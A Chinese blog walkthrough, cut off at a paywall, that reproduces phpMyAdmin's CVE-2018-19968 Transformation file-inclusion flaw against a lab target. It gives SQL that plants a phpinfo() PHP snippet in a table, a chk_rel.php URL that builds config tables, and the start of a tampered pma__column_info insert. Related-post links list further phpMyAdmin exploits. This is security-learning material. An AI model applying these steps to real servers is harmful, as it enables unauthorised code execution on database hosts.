phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

最新推荐文章于 2023-12-10 19:55:45 发布
最新推荐文章于 2023-12-10 19:55:45 发布
阅读量311 收藏 2
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40448537/article/details/106918202
版权

phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)

2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞,影响4.8.0~4.8.3版本,CVE编号CVE-2018-19968。

这是一个需要登陆利用的漏洞,首先需要实现登陆,在已只用户名和密码的情况下我们先登陆查看查看网页情况,先实现手工注入再编写exp脚本,我们实验的是一个已经搭建好的靶机地址为:

靶机

在这里插入图片描述

登陆后查看

在这里插入图片描述

第一步:创建数据库并将PHP代码写入SESSION文件中

可以看见后台已经有很多创建的数据库了,咱们也来创建数据库点击SQL输入代码

CREATE DATABASE shanhe;
CREATE TABLE shanhe.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO shenhe.bar SELECT '<?php phpinfo(); ?>';

这里建议是使用个性化的数据库名,并且即用即删,相同的库名会导致一些错误,执行SQL语句后我们来看:

在这里插入图片描述

第二步:访问网页生产配置表

已经存在我们创建的数据库了,访问如下连接数据库shanhe中生成phpMyAdmin的配置表,得到如下结果即为成功

http://94.191.112.225/phpmyadmin/chk_rel.php?fixall_pmadb=1&db=shanhe

在这里插入图片描述

第三步:将篡改后的Transformation数据插入表pma__column_info

点击SQL输入如下sql语句,注意要把数据库名改为自己创建的数据库名

INSERT INTO `pma__column_info`SELECT '1', 'shanhe', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop'
最低0.47元/天 解锁文章
蜡笔小新说安全
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-19968 (phpMyAdmin任意文件包含/远程代码执行漏洞)
ranqi666的博客
04-25 988
前言 TransformationphpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段 ‘Filename’,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击...
爬虫 web登录 CVE-2018-19968
椰奶冻不安全的博客
06-22 821
安全脚本开发 目标 以CVE-2018-19968为例,写exp,一键getshell 所工具: python / burp,可选 pycharm / ipython 1. 简单爬虫 python requests库 指定汉字的笔划动图下载 2. web登录 3. CVE-2018-19968 手动利用 phpMyAdmin文件包含 4. 编写exp 登录 执行SQL 文件包含写入webshell 目录 一、简单爬虫 二、Web登录 三、CVE-2018-19968 四、编写exp
CVE-2018-19968 phpmyadmin文件包含getshell连载(完结)
PANDA墨森的博客
06-24 300
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过文件包含getshell,本文将通过另一个CVE文件包含漏洞继续展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13169447.html #001环境搭建 在线环境:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1 也可以选择自行到phpmyadmin官网下载对应版本 #002漏洞复现 1、首先登...
红队攻防实战之phpmyadmin-RCE集锦
最新发布
自强不息
12-10 942
世界上只有一种真正的英雄主义,那就是认清了生活的真相后,仍然热爱她
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 481
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2463
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
phpMyAdmin-4.6.6
04-06
phpMyAdmin-4.6.6-all-languages
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1478
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
phpmyadmin 0day exp
weixin_34014277的博客
07-13 245
虽然还是很鸡肋(要求根目录下存在config文件夹且可写),不过好很多了。可以无视session.auto_start配置了。 #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ pma...
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9508
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
CVE-2018-10933 身份验证绕过漏洞验证
锋刃科技的博客
10-28 6872
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
phpMyAdmin 4.8.0~4.8.3 Transformation 任意文件包含/远程代码执行漏洞
weixin_33908217的博客
12-15 317
本文转载自:phpMyAdmin 4.8.0~4.8.3 Transformation 任意文件包含/远程代码执行漏洞 (登录/PMASA-2018-6/CVE-2018-19968) | VULNSPY 2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞...
phpMyAdmin 漏洞小集合
SoulCat
08-07 5576
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734)+4.8.1 远程文件包含漏洞CVE-2018-12613) 有情有义又是无米之炊,无情无义却是饕餮盛宴. 远程代码执行漏洞CVE-2016-5734) phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修...
修复web生产平台项目下的漏洞修复CVE-2018-19518、CVE-2018-19935、CVE-2017-9798)
向技术大牛致敬
03-27 6592
漏洞信息: University of Washington IMAP Toolkit 2007f 命令注入漏洞(CVE-2018-19518) PHP 安全漏洞(CVE-2018-19935) Apache HTTP Server 安全漏洞(CVE-2017-9798)【原理扫描】 漏洞说明: University of Washington IMAP Toolkit 2007f...
Win2003 IIS6+PHP5+MySQL5+Zend优化与phpMyAdmin安装指南
首先,作者强调了在遇到特定问题时的排查方法,如MYSQL或MYSQLDUMP服务自动关闭,可能是由于瑞星防火墙拦截了相关EXE文件,解决办法是将这些文件添加到防火墙白名单并放行。对于安装Zend后的FASTCGI错误,建议卸载后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值